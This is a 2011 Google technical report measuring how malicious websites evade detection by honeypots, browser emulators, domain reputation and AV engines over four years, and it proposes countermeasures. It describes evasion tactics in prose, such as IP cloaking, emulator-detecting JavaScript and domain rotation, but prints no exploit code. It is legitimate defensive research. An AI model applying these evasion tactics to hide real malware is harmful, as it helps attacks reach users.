# APPENDIX
# 1

Google Technical Report rajab-2011a, July 2011

# Trends in Circumventing Web-Malware Detection

Moheeb Abu Rajab, Lucas Ballard, Nav Jagpal, Panayiotis Mavrommatis,

Daisuke Nojiri, Niels Provos, Ludwig Schmidt[*]

## ABSTRACT

Malicious web sites that compromise vulnerable computers are an ever-present threat on the web. The purveyors of these sites are highly motivated and quickly adapt to technologies that try to protect users from their sites. This paper studies the resulting arms race between detection and evasion from the point of view of Google's Safe Browsing infrastructure, an operational web-malware detection system that serves hundreds of millions of users. We analyze data collected over a four year period and study the most popular practices that challenge four of the most prevalent web-malware detection systems: *Virtual Machine client honeypots*, *Browser Emulator client honeypots*, *Classification based on domain reputation*, and *Anti-Virus engines*. Our results show that none of these systems are effective in isolation. In addition to describing specific methods that malicious web sites employ to evade detection, we study trends over time to measure the prevalence of evasion at scale. Our results indicate that exploit delivery mechanisms are becoming increasingly complex and evasive.

## 1. INTRODUCTION

Malicious web sites capable of compromising vulnerable computers have been on the rise for many years. As web pages have become more interactive and feature-rich, the complexity of the browser and the software components involved in rendering web content has increased significantly. Over the last few years, almost any browser including support for technologies such as Flash, Java, PDF or QuickTime has been susceptible to so called *drive-by download* attacks that allow adversaries to run arbitrary software on a vulnerable computer system.

The difficulty of discovering malware on the web is amplified by the fundamental conflict between those who identify and block malicious content and those who attempt to evade detection to distribute malware. The resulting arms race has led to many novel approaches for identifying web-based malware. Despite this interest, there has been no dedicated study analyzing whether evasion techniques are effective, and more importantly, whether they are being actively pursued to stealthily distribute malware. This paper seeks to answer these questions.

We study four years of data collected by Google's web-malware detection systems, which leverages four of the most popular web-malware detection technologies: *Virtual Machine client honeypots*, *Browser Emulator client honeypots*, *Classification based on domain reputation*, and *Anti-Virus engines*. Our analysis reveals that adversaries actively try to evade each of these systems. Despite this, our results indicate that combining multiple types of client honeypots can improve detection rates.

This paper makes the following contributions: (1) an analysis of the prevalence and impact of different evasion techniques against the four most popular web malware detection systems. (2) an evaluation that shows how these detection systems complement each other to improve detection rates. (3) an investigation of the complexity of JavaScript on the web and how it relates to evasion. (4) a study of which vulnerabilities have been targeted by web-based malware and measure how this makeup has changed over time. Our analysis raises awareness about the evasive tactics that must be considered when developing operational web malware detection systems.

## 2. BACKGROUND

The attack surface of the modern web browser is quite large. Web-based malware can target vulnerabilities in the browser itself, or against the myriad of plugins that extend the browser to handle, for example, Flash, Java applets, or PDF files. A vulnerability in any of these components may be leveraged to compromise the browser and the underlying operating system. As a prerequisite to exploiting a user, an adversary needs to expose the user's browser to malicious payloads. This can be achieved by sending an email or IM to the user containing a URL to a malicious server, or by compromising web servers and injecting references to malicious code into the content served to users [17].

Many different approaches for detecting malicious web content have been proposed. In the following we review the most prevalent: Virtual Machine Honeypots, Browser Emulation Honeypots, Classification based on Domain Reputation, and Virus Signatures.

**Virtual Machine Honeypots.** Several VM-based detection systems have been proposed in the literature [10, 16, 15, 19, 9]. They typically detect exploitation of the web browser by monitoring changes to the operating system, such as the creation of new processes, or changes to the file system or registry. Here, the virtual machine functions as a black box since no prior knowledge of vulnerabilities or exploit techniques is required.

HoneyMonkey [19] launches Internet Explorer against a URL and after waiting for several minutes determines if suspicious file system changes were made. To detect zero-day exploits, the same URL is evaluated in Windows systems with different patch levels. Moshchuk et al. [10] went further in that their system also looked for newly created processes as well as file system writes not initiated by the browser. In previous work [16], we demonstrated that VM-based web-malware detection could be scaled to scan a large portion of the web and presented statistics on over 3 million drive-by download URLs.

While virtual machines run a complete software system and may detect exploits of yet unknown vulnerabilities, precisely determining what resource triggered the exploit or which vulnerability was

---

[*]Research conducted as an intern at Google.

targeted may be difficult. Additionally, managing multiple VM images with different combinations of exploitable software components can be an arduous task. Browser emulation has been proposed to address these shortcomings.

**Browser Emulation.** Instead of deploying VM honeypots, one can emulate a browser and use dynamic analysis to identify exploits. JSAND by Cova et al. [3] follows this approach and emulates a browser to extract features from web pages that indicate malicious behavior. PhoneyC [13] is another Browser Emulator. It includes support for JavaScript and VBScript as well as the ability to instantiate fake ActiveX objects. Modules with signatures for known vulnerabilities allow PhoneyC to detect exploits against plugins.

Browser emulators can pinpoint the exploited vulnerability and even establish a chain of causality including every single web request involved in a drive-by download. On the other hand, emulators cannot detect exploit attempts against unknown vulnerabilities and must be updated to handle quirks in mainstream browsers as they are discovered.

**Reputation Based Detection.** In the absence of malicious payloads, it is possible to take a content-agnostic approach to classify web pages based on the reputation of the hosting infrastructure. Felegyhazi et al. leverage DNS properties to predict new malicious domains based on an initial seed [4]. Lee et al. developed Notos, a dynamic reputation system for DNS, that can flag domains as malicious weeks before they appear on public blacklists [1]. Although Notos is not meant for detecting malicious web pages, a similar approach can be followed by flagging pages that include resources that are hosted on malicious domains.

**Signature Based Detection.** Traditional Anti-Virus (AV) systems operate by scanning payloads for known indicators of maliciousness. These indicators are identified by AV signatures, which must be continuously updated to identify new threats. Typically, packed executables or HTML must be unpacked before performing matching. For web pages, this might involve HTML parsing or rudimentary JavaScript execution. If unpacking is not possible, AV engines may flag a binary as malicious solely by detecting the presence of the packer. For JavaScript, AVs focus on detecting the presence of heavy obfuscation. Oberheide et al. showed that combining multiple AV engines can significantly improve the detection rate [14].

## 3. EVADING DETECTION

In Section 2, we discussed different approaches for detecting malicious web pages. Just as these approaches are being improved, adversaries are becoming more skilled at hiding malicious content. To better understand how adversaries attempt to stay under the radar, we present an overview of common tactics that we encounter.

Social engineering has emerged as a growing malware distribution vector [18]. In social engineering attacks, the user is asked to install a malware binary under false pretenses. Social engineering attacks challenge automated detection systems by requiring arbitrarily complex interaction before delivering the payload; interaction that can be difficult to simulate algorithmically.

Attacks that target specific software configurations can also challenge VM honeypots that employ a VM image with a different OS, browser, or set of plugins. Even if one deploys multiple VM images with different software components, selecting the image to scan a target page is challenging [3], and resource limitations might reduce the number of times a page can be scanned with different configurations.

To evade browser emulators, AV engines, or manual analysis, adversaries can test for idiosyncratic properties of the browser and only reveal exploit code if the test passes. Often, this is built into packers that fail to deobfuscate malicious payloads if certain conditions are not met. While the set of potential differences between emulators and real browsers is large, we have found that tests typically fall into three high-level categories: *JavaScript Environment Compatibility*, *Parser Compatibility*, and *DOM Completeness*.

In the case of an IE-specific exploit, code can probe the JavaScript Environment for differences between IE's proprietary JavaScript engine and open source JavaScript engines [12, 11, 5], which are more likely employed by emulators. This typically goes beyond simply testing for properties in the `navigator` object, and focuses instead on more arcane differences, e.g., changes to the DOM caused by CSS, which are typically not implemented by emulators that do not need to handle rendering. One can also identify semantic differences in both JavaScript and HTML parsers, for instance, IE's JavaScript parser allows `;` between `try` and `catch` clauses, while other JavaScript parsers do not. Perhaps one of the most challenging properties to emulate is the DOM of the browser, especially when accounting for the bugs exhibited by different browsers' DOM implementations. For instance, IE6 and IE7 will add extra nodes to the DOM when encountering incorrectly formed HTML. Concrete examples of each of these phenomena can be found in Appendix A.

While adversaries often turn to elaborate technical constructs to evade detection, a simple yet powerful approach is to cloak against scanners by serving malicious content to users but benign content to the detector. While there are many forms of cloaking, in this paper we focus on arguably the most simple and effective approach: cloaking at the IP level. To do so, malicious servers simply refuse to return malicious content to requests from certain IP addresses.

## 4. EXPERIMENTAL SETUP

The goal of this paper is to measure forms of circumvention described in Section 3 and determine whether the use of evasive tactics has increased over the last several years. To do so, we analyze the data collected by Google's Safe Browsing infrastructure [16], a large-scale web malware detection system. The data generated by this system is used by more than 400 million users per week and is therefore the target of many forms of evasion. Moreover, the system classifies sites using VM-based client honeypots, a Browser-Emulator, Signature-based AV engines, and Domain Reputation, and is thus ideal for evaluating how evasion affects each of these popular technologies.

### 4.1 System Overview

The malware detection pipeline takes as input a large corpus of URLs from a variety of sources. For example, we select URLs from Google's web index using both random sampling and a machine learning classifier that is tuned to identify pages that likely contain malware [16]. We also sample URLs that match trending search queries, as well as user-reported URLs. The selection criteria for the data has not changed significantly over the course of our study.

Each URL is fed to a VM-based honeypot, which browses to the URL with an unpatched version of Internet Explorer that has popular plugins and runs on an unpatched Windows OS. The system records host and network activity, including new processes, file system changes, registry changes, and network fetches. All network fetches and system state changes are stored in a Bigtable [2] for post processing.

Once a VM has processed a URL, a scoring module, `PageScorer`, analyzes the saved content to identify malicious behavior. First, all network fetches are scanned by multiple AV engines and matched against an internal list of domains that are known to serve malicious

**Figure 1: The diagram shows a high-level overview of Google's web-malware detection system. VMs collect data from web pages and store it in a database for analysis.** PageScorer leverages multiple scorers to determine if a web page is malicious.

content; see Section 4.1.2. Next, PageScorer instructs a Browser Emulator to reprocess the content that was retrieved by the VM to identify exploits. The Browser Emulator uses the stored content as a cache and thus does not make any network fetches; see Section 4.1.1. Finally, PageScorer uses a decision tree classifier to combine the output of the VM, AV Engines, Reputation Scorer, and Browser Emulator to determine whether the page attempted to exploit the browser; see Figure 1. The output of PageScorer, including whether the page caused new processes to be spawned, whether it was flagged by AV engines, which exploits it contained, and whether it matched Domain Reputation data, is stored along with the original data from the VM for future analysis.

A description of our VM-based honeypots and AV engine integration has been previously published [16, 17]. Since then we have added Browser Emulation and a Domain Reputation pipeline which we briefly summarize below to familiarize the reader with the data collection process.

### 4.1.1 Browser Emulation

Our Browser Emulator is a custom implementation similar to other mainstream emulators including PhoneyC [13] and JSAND [3]. We thus believe that its performance is representative of Browser Emulators in general.

Briefly, the Browser Emulator is built on top of a custom HTML parser and a modified open-source JavaScript engine. It constructs a DOM and event model that is similar to Internet Explorer. To ensure a faithful representation of IE, we have modified all parsers to handle IE-specific constructs; for examples, see Appendix A. The Emulator detects exploits against both the browser and the plug-ins by monitoring calls to known-vulnerable components, as well as monitoring DOM accesses.

The emulator can also perform fine-grained tracing of JavaScript execution. When running in tracing mode, it records every function call and the arguments to those calls, e.g. we record which DOM functions were called and which arguments were passed to them. This allows for more detailed analysis of exploitation techniques, which we explore later in the paper.

### 4.1.2 Domain Reputation

The domain reputation pipeline runs periodically and analyzes the output of AV engines and the Browser Emulator to determine which sites are responsible for launching exploits and serving malware. We call these sites *Distribution Domains*. The pipeline employs a decision-tree classifier to decide whether a site is a distribution domain. Features include, for example, whether we have seen

the site deliver an exploit during a drive-by download.

In addition to assessing whether a domain is serving malware, the classifier also examines network requests to that domain from IP addresses not associated with our organization. This allows us to determine whether domains are cloaking against our system at the network level. We call such domains *Cloaking Domains*, they are domains that distribute malware and also actively try to evade detection. Distribution and Cloaking Domains make up our Domain Reputation data, which is fed back into PageScorer to improve detection rates for drive-by downloads.

## 4.2 Data Collection

In order to study evasion trends we leverage two distinct data sets. The first set, Data Set I, is the data that is generated by our operational pipeline, i.e., the output of PageScorer. It was generated by processing ∼1.6 billion distinct web pages collected between December 1, 2006 and April 1, 2011. This data is useful for studying trends that we observe in real time. The limitation with this data is that we continuously tweak our algorithms to improve detection, thus any trends observed from Data Set I could be due to either changes in the web pages that we are processing, or to improvements to our algorithms. To eliminate this uncertainty, we introduce our second data set, Data Set II.

Data Set II is created as follows. First, we select a group of pages from Data Set I. We sample pages from the time period between December 1, 2006 and October 12, 2010 that were marked as suspicious by the VM-based honeypot, the Browser Emulator, the AV scanners, or our Reputation data. Note that this does not mean PageScorer classified these pages as malicious. For example, if an AV engine flagged a page but the other scoring components did not, then the page would not be classified as bad by PageScorer, but it would be added to the sample. In this way the sample includes every bad page that our pipeline processed over the four year period, as well as some other "suspicious" pages. In addition to these pages, our sample also includes 1% of other "non-suspicious" pages selected uniformly at random from the same time period.

For each of these pages, we *rescore* the original HTTP responses and VM state changes that were stored in our database using a fixed version of PageScorer from the end of October, 2010. This version consisted of algorithms and data files, including AV signature files, from the end of the data collection period. By fixing the scorer we ensure that any observable trends are due to changes in the data, and are not due to the evolution of our algorithms. The output of this rescore comprises Data Set II.

In sum, Data Set II consists of ∼160 million distinct web pages from ∼8 million sites. We enabled JavaScript tracing on a subset of this data, comprising ∼75 million web pages from ∼5.5 million distinct sites.

In this paper the term *site* refers to a domain name unless the domain corresponds to a hosting provider. In the latter case, different host names are indicative of separate content owners, so we take the host name as the site. For example, http://www.cnn.com/ and http://live.cnn.com/ both correspond to the site cnn.com, whereas http://foo.blogspot.com/page1.html and http://bar.blogspot.com/page2.html are mapped to foo.blogspot.com and bar.blogspot.com, respectively. Throughout this paper we provide statistics at the site level, and aggregate data by month. We do this to avoid skew that could occur if our sampling algorithm selected many pages from the same site. For example, if the system encountered exploits in a given month on two URLs that belong to the same site, we count only one exploit.



**Figure 2: The graph shows the total number of sites per month in Data Set II. The large spike in 2008 is due to the unexpected appearance of a benign process that caused many more pages to be included in our analysis during that time.**

Figure 2 shows the number of sites in Data Set II for each month, both with and without JavaScript tracing, along with the total number of sites containing pages that were marked as drive-by downloads in Data Set II. The large spike in the fall of 2008 is due to a misconfiguration in PageScorer, which mistakenly labeled a benign process as malicious. This did not result in any misclassification at the time since no other scanners produced corroborating signals. Our results are also unaffected by the misconfiguration because it was fixed before we reclassified the data. Ignoring the outlier, on average the data set consists of ∼387, 000 sites per month, of which ∼257, 000 launched drive-by downloads and ∼170, 000 were processed with JavaScript tracing enabled.

Our data set comes with some caveats. First, we are measuring the trends observed by our systems. If we never observed malicious behavior from a given malware campaign, then the results are not included in our study. We believe, however, that Google Safebrowsing's position provides a useful vantage point into malware on the web. Second, results derived from Data Set II cannot be compared to real-time performance of other technologies. Data Set II is generated using data, e.g., AV signatures, and algorithms that might not have been available when the pages were originally encountered. Third, while reclassifying pages to create Data Set II ensures that modifications to our algorithms do not create artificial trends, the pages that comprise Data Set II were selected because they originally exhibited suspicious behavior as determined by PageScorer. To alleviate the impact of this potential bias, we add a 1% random sample, constituting ∼80 million URLs, as well as include pages that were originally classified as suspicious, but not malicious. This ensures that Data Set II includes pages that our algorithms may have missed in the past. Fourth, we believe that false positives are rare in our data set. This is difficult to quantify in an operational setting, but in our experience, based on internal analysis, reports from users, web masters, and StopBadware.org/, the system generates negligible false positives. Over four years of operation we have had fewer than a handful of incidents causing false positives.

## 5.  TRENDS IN EVASION

In Section 3 we discussed the possible ways in which malicious web pages can be designed to resist detection. This section ana-



**Figure 3:  The graph shows the number of sites involved in Social Engineering attacks compared to all sites hosting malware or exploits.**

lyzes the data generated by the detection infrastructure described in Section 4. We assess the extent to which techniques that hinder automatic detection are employed by adversaries on the Internet. We focus on the challenges that face each of the four detection techniques, and discuss potential measures to adapt to the various challenges.

### 5.1   Challenges for VM-based Detection

As mentioned earlier, social engineering is an emerging attack trend that could potentially limit the effectiveness of VM-based detection schemes. To measure whether adversaries employ social engineering techniques, we analyzed Data Set II with heuristics [18] to identify pages that were likely generated from templates employed by Fake AV campaigns. Figure 3 shows the number of social engineering sites detected monthly relative to all sites involved in distributing malware or exploits. The prevalence of social engineering has increased over the last four years. Although regular malware sites still constitute about 98% of all distribution sites, we see an increase in the number of sites employing social engineering. In January 2007, there was only one site distributing Fake AV, whereas by September, 2010 this number increased to 4, 230.

One example of user interaction frequently found on Fake Anti-Virus pages is a dialog that requires a mouse click before a malware binary is sent to the browser. This can be a dialog from the system, or a dialog simulated by the web page with images or CSS. To assess the extent to which malware authors have adopted this technique, we instrumented our operational VM system to initiate mouse clicks on the current web page. We then evaluated each social engineering site twice: once without any interaction and another time with mouse clicking enabled. We examined a subset of 210, 000 pages from Data Set I from October 1, 2010 to April 1, 2011 and compared the percentage of malware downloads in both cases. With clicking enabled, we measured a 40% increase of malware binaries downloaded by the VMs.

There are several possible explanations for the increasing popularity of social engineering attacks: (1) These attacks are successful even if no exploitable vulnerabilities are present in the browser environment; (2) For Fake AV, social engineering provides a direct route to monetization; (3) Social engineering attacks make VM-based detection harder since malicious payloads appear only after user interaction with the browser. The first explanation seems



**Figure 4: The heat map shows the relative distribution of exploits encountered on the web over time. Every second CVE is labeled on the Y-axis.**

| CVE # | Δ days | CVE # | Δ days |
|---|---|---|---|
| 2008-3008 | 4 | 2008-0015 | -3 |
| 2009-4324 | 2 | 2007-5779 | -3 |
| 2008-2463 | 2 | 2007-3148 | -3 |
| 2008-0955 | 2 | 2008-1472 | -6 |
| 2007-4983 | 2 | 2010-0886 | -7 |
| 2009-0075 | 1 | 2009-3672 | -10 |
| 2010-2883 | 0 | 2007-5064 | -35 |
| 2010-1818 | 0 | 2009-2496 | -36 |
| 2010-0806 | -3 | 2007-6144 | -87 |
| 2008-0623 | -3 | 2008-6442 | -242 |

**Table 1: Number of days after public release of vulnerability (Δ days) that exploits were seen in Data Set II. Negative numbers indicate that the exploit was seen before public release.**

less likely as exploitable vulnerabilities were present in all versions of Internet Explorer and popular plugins during the course of our study. Regardless of the motive, social engineering poses a challenge to VM-based honeypots must be accounted for.

**Countermeasures.** These results show that VM honeypots without user interaction may not detect web pages distributing malware via social engineering. In addition to simulating user interacting with the VM, one can also improve detecting by pursuing a signature based approach [18].

## 5.2   Browser Emulation Circumvention

We hypothesize that drive-by download campaigns primarily employ two tactics to circumvent Browser Emulation: rapid incorporation of zero-day exploits, and heavy obfuscation that targets differences between the emulator and a browser. We consider both in this section.

**Exploit Trends.** Once a vulnerability becomes public, it is quickly integrated into exploit kits. As a result, Browser Emulators need to be updated frequently to detect new vulnerabilities. To highlight the changing nature of exploitation on the web, we show the relative prevalence of each of the 51 exploits identified by our Browser Emulator in Data Set II in Figure 4. We see that 24 exploits are relatively short lived and are often replaced with newer exploits when new vulnerabilities are discovered. The main exception to this is the exploit of the MDAC vulnerability which is part of most exploit kits we encounter and represented by the dark line at the bottom of the heat map. This data highlights an important opportunity for evasion. Each time a new exploit is introduced, adversaries have a window to evade Browser Emulators until they are updated. Of the 51 exploits that we tracked, the median delay between public disclosure[1] and the first time the exploit appeared in Data Set II was 20 days. However, many exploits appear in the wild even before the corresponding vulnerability is publicly announced. Table 1 shows the 20 CVEs that have the shortest delay between public announcement and when the exploit appeared in Data Set II.

**Obfuscation.** To thwart a Browser Emulator, exploit kits typically wrap the code that exercises the exploit in a form of obfuscation

---
[1]As recorded at http://web.nvd.nist.gov/.

that may not execute correctly in an emulated environment, but will work correctly in a real browser. This generally results in complex run-time behavior. To measure whether adversaries are turning to such techniques we examined the data that was generated with JavaScript tracing enabled in Data Set II and computed three different complexity measures:

- *Number of function calls* measures the number of JavaScript function calls made in a trace.

- *Length of strings passed to function calls* measures the sum of the lengths of all strings that are passed to any user-defined or built in JavaScript function.

- *DOM Interaction* measures the total number of DOM methods called and DOM properties referenced as the JavaScript executes.

We first consider the number of JavaScript function calls made when evaluating a page. To establish a baseline we counted the number of function calls made during normal page load for each of the benign web pages in Data Set II. We also counted the number of function calls made before delivering the first exploit for each of the malicious pages in our Data Set II. As our analysis is based on sites rather than individual web pages, we compute the average value for sites on which we encounter multiple web pages in a given month. While sites with exploits are less frequent than benign sites, our analysis finds between ∼50 and ∼150 thousand unique sites containing exploits per month with the exception of the first few months in 2007 where the overall number of analyzed sites is smaller.

Figures 5 and 6 show the 20%, 50% and 80% quantiles for the number of function calls for both benign and malicious web sites. In Figure 5, we see an order of magnitude increase in the number of JavaScript function calls for benign sites. Figure 6 shows a change of over three orders of magnitude for the median for sites that deliver exploits. At the beginning of 2007, we observed about 20 JavaScript function calls, but the number of function calls jumped to ∼7,000 in 2008, and again to 70,000 in December 2009.

The number of JavaScript function calls in Figure 6 exhibits several distinct peaks and valleys. These can be explained by two phenomena. First, certain exploits require setup that employs more function calls than others. The decrease in number of function calls in Autumn 2008, and again in the end of 2010 correspond to the increasing prevalence of exploits against RealPlayer (CVE-2008-1309) and a memory corruption vulnerability in IE (CVE-2010-0806). The proof-of-concept exploits that were wrapped into



**Figure 5: The graph shows the number of JavaScript function calls for benign web sites. Over the measurement period, we observe an order or magnitude increase for the median.**



**Figure 6: The graph shows the number of JavaScript function calls for web sites with exploits. We count only the function calls leading up to the first exploit. We observe an increase of over three orders of magnitude for the median over the measurement period.**



**Figure 7: The graph shows the string length complexity measure on benign pages.**



**Figure 8: The graph shows the string length complexity measure on pages with exploits.**

exploit kits made few function calls, spraying the heap with simple string concatenation. However, the increased count at the beginning of 2009 and early 2010 correspond to exploits targeting two other memory corruption bugs in IE, CVE-2009-0075, and CVE-2010-0249. The proof-of-concept for these exploits prepared memory by allocating many DOM nodes with attacker controlled data, and thus required many function calls to launch the exploit, see Appendix C and D for example source code.

The second phenomenon that explains the general upward trend is the appearance of new JavaScript packers that obfuscate code using cryptographic routines such as RSA and RC4, which make many function calls. To trigger an exploit, it is usually not necessary to call many functions. For example, our system encountered exploits for CVE-2010-0806 for the first time in March 2010. At that time, the median number of functions calls to exploit the vulnerability was only 7, whereas the median rose to 813 in July 2010. Thus we attribute the rise in complexity to obfuscation meant to thwart emulation or manual analysis.

Next we consider the total string length complexity measure. See

Figures 7 and 8 for this metric on benign and malicious pages, respectively. As with the number of function calls, we see a general upward trend. We believe these trends are influenced more by packers than by choice of exploit. The reason for this is that heap sprays generally do not pass long strings to method calls; more often they concatenate strings or add strings to arrays. Thus, these trends measure changes in packers over time. Clearly, as the size of exploit kits and the complexity of packing algorithms grow, so does the total amount of data that must be deobfuscated.

Another way to assess the complexity of JavaScript is to determine which DOM functions are called before reaching an exploit. This measurement captures obfuscation that probes the implementation of a Browser Emulator for completeness. We instrumented our JavaScript engine to record the usage of 34 DOM functions and properties that are commonly used or involved in DOM manipulations, see Appendix E. We then compute the relative frequency of these calls for both benign pages, and pages that deliver exploits. Figures 9 and 10 show heat maps plotting the relative frequencies of each DOM function or property. The darkness of each entry rep-

 

**Figure 9: The heat map shows the DOM functions utilized by benign web pages over time.**

**Figure 10: The heat map shows the DOM functions utilized by exploit JavaScript over time.**

resents the fraction of sites that utilize that specific DOM function or property.

For benign pages, the number of DOM accesses has increased as the web has become more interactive and feature rich. For benign web sites, we note that the indices of the most common functions are 3 and 13, which refer to `document.body` and `getElementById` respectively. DOM access patterns for sites that deliver exploits are remarkably different as significantly fewer DOM interactions are found. Two indices, 7 and 31 stand out. They refer to `createElement` and `setAttribute` respectively. These two functions are employed to exploit MDAC (CVE-2006-0003) [8] which has been popular since 2006 and is part of most exploit kits. While Figure 9 shows that the `clearAttributes` function is not commonly used in benign web pages, we see a sudden increase of it in exploits in February 2009. This coincides with the public release of exploits targeting CVE-2009-0075; see Appendix C.

Further examination of this exploit indicates that the delivery mechanism has been updated over time to exercise an increasing number of DOM API functions. When the exploit was first released, it made use of only the three functions that were necessary to launch the exploit: `createElement`, `clearAttributes`, and `cloneNode`[2]. Over time, however, there was a steady uptick in the number of non-essential DOM functions that were called before delivering the payload; see Figure 11. Starting in March 2010, about 20% of sites exploiting this vulnerability also make calls to `appendChild` and read `innerHTML`. In May 2010, more DOM functions are called to stage the exploit. This change in behavior indicates that the JavaScript to stage the exploit has become more complex, likely to thwart analysis.

**Countermeasures.** The trends in exploitation technique and each of the complexity measures indicate that the perpetrators of drive-by download campaigns are devoting significant effort towards evading detection. In order to keep pace with zero-days and obfuscation techniques, Browser Emulators should be frequently updated. To facilitate such updates, it is possible to monitor the system for unexpected errors or to compare its output to AV engines or a VM infrastructure to identify potential deficiencies. One could also rely on these other technologies to address inherent limitations, for instance VM honeypots can be used to detect zero-days. We analyze



**Figure 11: The heat map shows the DOM functions utilized to exploit CVE-2009-0075. The graph shows that only two DOM functions are required to trigger the exploit, but that over time the DOM interactions have become more complex.**

the relative performance of our Browser Emulator in Section 6.

## 5.3   AV Circumvention

AV engines commonly use signature-based detection to identify malicious code. While it is well-known that even simple packers can successfully evade this approach, we wanted to understand the impact of evasion techniques at a large scale. Specifically, we measured two aspects of evasion. First, we studied whether deobfuscating web content would significantly improve detection rates. Second, we studied how often AV vendors change their signatures to adapt to both False Positives and False Negatives.

To study the impact of deobfuscation, we leveraged our Browser Emulator and hooked all methods that allow for dynamic injection of code into the DOM, e.g., by recording assignment to `innerHTML`. The line labeled *Deobfuscated* in Figure 12 shows the percent of additional sites in `Data Set II` that were flagged by AV engines only after providing the engines with this injected content. This drastically improves performance of the AV engines, in some cases by

---

[2]We did not label `cloneNode` as a function of interest during our analysis.



**Figure 12: The graph shows the monthly percentage of sites with changing virus signals between** Data Set I **and** Data Set II**.**

**Figure 13: The graph shows malware distribution chain length over time.**

more than 40%.

To study the impact of changes to AV signatures, we compared our AV classifications for each page in Data Set II to its original classification in Data Set I. Figure 12 shows the percentage of sites with at least one virus signal change. The line labeled *Added* shows the percentage of sites that had AV signals in Data Set II but not in Data Set I. As the graph shows, a significant percentage of sites have new virus signals when they are rescored. These changes could be due to three causes: (1) delay in signature updates in our operational environment; (2) AV vendors pruning signatures over time; and (3) Improvements of AV signatures over time by AV vendors. We believe that the discrepancy is due to (3), since we update our AV signatures every two hours in our operational setting, and one of our AV vendors confirmed that only the signatures that cause false positives are pruned. This implies that AV engines can suffer from significant false negatives in operational settings. Looking back only one year, about 40% of the sites with virus signals were only seen in Data Set II. The line labeled *Removed* shows the percentage of sites with pages that were flagged by AV engines in Data Set I but not in Data Set II. These removals are likely due to signatures that produced false positives. The general downward trend for each of the three plots can be explained by the fact that as we come to the end of the data collection period, the AV signatures that were used for both Data Set II and Data Set I become similar to one another.

Both of these experiments indicate that while AV vendors strive to improve detection rates, in real time they cannot adequately detect malicious content. This could be due to the fact that adversaries can use AV products as oracles before deploying malicious code into the wild.

**Countermeasures.** Our results show that the JavaScript packing employed by malware distribution sites has a direct impact on the accuracy of AV scanners and that Signature-based AV detection can suffer from both false negatives and false positives. Nonetheless, some procedures can improve detection. To maintain optimum detection, one should continuously update virus definitions. One can also improve detection by using multiple AV engines. Perhaps the best way to improve upon AV detection rates is to use them as a component in a larger system.

### 5.4    Circumventing Domain Reputation

Evading classification by Domain Reputation Data simply involves registering more domains to distribute malware. This generally involves two steps: registering domains en masse, and setting up redirectors to send traffic to these domains. To measure trends in registering new domains, we computed the observed lifetime of distribution domains in Data Set II. We estimate a lower bound for lifetime as the interval between the time the site first appeared in our data to the last time it appeared in our data. We ignore sites that appeared only once, or whose life span is less than 10 minutes. In total we observed $\sim$1.6 million distribution domains, of which $\sim$ 295,000 appeared only once, and $\sim$ 330,000, had a lifespan of less than 10 minutes. The median lifetime reduced significantly over our data collection period; from one month between 2007 and 2009, down to one week in July 2010, and down to 2 hours in October 2010.

In addition to domain rotation, adversaries attempt to avoid reputation-based detection by setting up intermediary sites whose sole purpose is to funnel traffic to distribution site. Figure 13 shows the length of malware distribution chains over time in Data Set II. The median is about one to two domains. Several sites use longer distribution chains with a 90th percentile of about 4 hops. The maximum chain length we observed was 20 hops. In many cases, a single redirector funnels traffic to several distribution sites. We measured the out-degree of sites involved in these chains and observed that about 35% of intermediary sites redirected to more than one distribution site. One notable example is a site that, at the time of this writing, is still active and redirected to over 1,600 malicious sites.

**Countermeasures.** We observed domain rotation frequently throughout our study. We believe that this is an attempt to evade reputation-based signals, or public domain blacklists. Two possible countermeasures to this type of evasion are: (1) successfully classifying redirectors as belonging to a campaign; and (2) classifying aggressively at the IP level. The second countermeasure is complicated by hosting providers that are typically abused by miscreants, but also serve legitimate sites.

### 5.5    IP Cloaking

IP Cloaking can be the most effective form of evasion, since it thwarts any sort of detection by client honeypots or AV engines.



**Figure 14: The graph shows how many compromised sites include content from cloaking sites in** Data Set II



**Figure 15: The graph shows sites with Exploit and New Process signals.**

For an adversary, IP-based cloaking is simple to deploy and usually requires only small changes to the web server's configuration; see Appendix B. To understand trends in IP cloaking, we computed the number of sites that actively cloak against our scanners using data from Data Set II. As described in Section 4, this detection is built into our Domain Reputation pipeline, and involves testing for content changes from different IP addresses. To measure cloaking in Data Set II, we aggregated the sites that we had discovered to cloak against our scanners, and counted how often resources from those sites were included by pages in Data Set II.

Figure 14 shows the number of sites per month that include content from domains known to be cloaking. The graph peaks in August 2009 at over 200,000 sites infected by cloaking domains. That peak coincides with a large-scale attack, where thousands of sites were infected to redirect to `gumblar.cn`, which actively cloaked our scanners.

Although the increase in the graph is partly due to improved detection of cloaking domains in our system, we believe that it is representative of the general state of cloaking. In our operational practice, we continuously monitor compromised web sites and the malicious resources they include. In 2008, we discovered that some malware domains no longer returned malicious payloads to our system but still did so to users. As a result, we developed detection for cloaking. At the time of this writing, IP cloaking contributes significantly to the overall number of malicious web sites found by our system. See Section 6 for a more detailed analysis.

**Countermeasures.** Our data indicates that IP-based cloaking has drastically increased over the lifetime of our data collection. If an adversary is suspected of cloaking against a set of known IP addresses, a detector can also initiate scans via a set of IP addresses unknown to the adversary. Observed differences in these extra scans likely indicates cloaking. It is important to rate-limit fetches from the unknown set of IP addresses to limit their visibility to the adversary. A detector can then establish a feedback loop and build a classifier that leverages the cloaking data to identify pages that launch drive-by downloads. Instead of generating signals based on the presence of a VM, Browser Emulator, or AV signals, it is possible to flag the page based on the inclusion of content from a cloaking domain.

# 6. MULTIFACETED MALWARE DETECTORS

As the results in Section 5 have shown, adversaries are actively changing exploitation techniques to evade detection. These efforts are not limited to any specific detection technique. In this section we consider the potential for a multi-faceted approach that leverages a combination of signals from different detection systems. In the following, we analyze Data Set II and present pair-wise comparisons between each of the four detection systems in the form of stacked bar graphs. We refer to a positive output from a detection system as a *signal*. The black and white bands denote the number of times one signal appeared on a site but not the other. The gray band denotes the number of times both signals appeared at the same time. Data is aggregated monthly by site over our four-year measurement period.

